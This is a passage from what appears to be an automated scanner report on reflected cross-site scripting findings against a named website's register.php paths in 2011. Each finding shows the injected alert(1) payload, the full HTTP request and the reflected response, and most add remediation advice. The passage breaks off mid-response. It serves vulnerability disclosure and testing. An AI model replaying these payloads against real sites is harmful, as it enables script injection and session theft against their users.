The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec938"><script>alert(1)</script>a29f3fc93b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/ec938"><script>alert(1)</script>a29f3fc93b/images/captcha.php HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:00:48 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/ec938"><script>alert(1)</script>a29f3fc93b/images/captcha.php?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.146. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e01ca"-alert(1)-"317cb53ca6e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/imagese01ca"-alert(1)-"317cb53ca6e/captcha.php HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:02:58 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</imagese01ca"-alert(1)-"317cb53ca6e/captcha.php?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.147. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload abf65%3balert(1)//2eee8c25453 was submitted in the REST URL parameter 3. This input was echoed as abf65;alert(1)//2eee8c25453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/imagesabf65%3balert(1)//2eee8c25453/captcha.php HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:04:18 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</imagesabf65;alert(1)//2eee8c25453/captcha.php?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.148. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aac1d"-alert(1)-"9f9190e1686 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.phpaac1d"-alert(1)-"9f9190e1686 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:05:48 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/captcha.phpaac1d"-alert(1)-"9f9190e1686?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.149. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5c094%3balert(1)//fdc672a90d7 was submitted in the REST URL parameter 4. This input was echoed as 5c094;alert(1)//fdc672a90d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php5c094%3balert(1)//fdc672a90d7 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:07:04 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/captcha.php5c094;alert(1)//fdc672a90d7?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.150. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 24e26%3balert(1)//2269ba39bcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24e26;alert(1)//2269ba39bcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php/24e26%3balert(1)//2269ba39bcf HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:00:01 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/captcha.php/24e26;alert(1)//2269ba39bcf?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.151. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28e2a"-alert(1)-"b6c6b4036c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php/28e2a"-alert(1)-"b6c6b4036c0 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:59:15 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/captcha.php/28e2a"-alert(1)-"b6c6b4036c0?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.152. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 984ba%3balert(1)//82be0326519 was submitted in the REST URL parameter 2. This input was echoed as 984ba;alert(1)//82be0326519 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C984ba%3balert(1)//82be0326519/images/flags/gif/jp.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:18:30 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<984ba;alert(1)//82be0326519/images/flags/gif/jp.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.153. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39a94"-alert(1)-"72c6a72738c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C39a94"-alert(1)-"72c6a72738c/images/flags/gif/jp.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:11:01 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<39a94"-alert(1)-"72c6a72738c/images/flags/gif/jp.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.154. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 724cf"><script>alert(1)</script>cb344a084ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/724cf"><script>alert(1)</script>cb344a084ee/images/flags/gif/jp.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:02:29 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/724cf"><script>alert(1)</script>cb344a084ee/images/flags/gif/jp.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.155. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b9135%3balert(1)//425f90b78df was submitted in the REST URL parameter 3. This input was echoed as b9135;alert(1)//425f90b78df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/imagesb9135%3balert(1)//425f90b78df/flags/gif/jp.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:23:34 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</imagesb9135;alert(1)//425f90b78df/flags/gif/jp.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.156. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9e3b"-alert(1)-"4865a24ba8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/imagesf9e3b"-alert(1)-"4865a24ba8f/flags/gif/jp.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:21:13 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</imagesf9e3b"-alert(1)-"4865a24ba8f/flags/gif/jp.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.157. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ba152%3balert(1)//0877ec22dea was submitted in the REST URL parameter 4. This input was echoed as ba152;alert(1)//0877ec22dea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flagsba152%3balert(1)//0877ec22dea/gif/jp.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:26:37 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
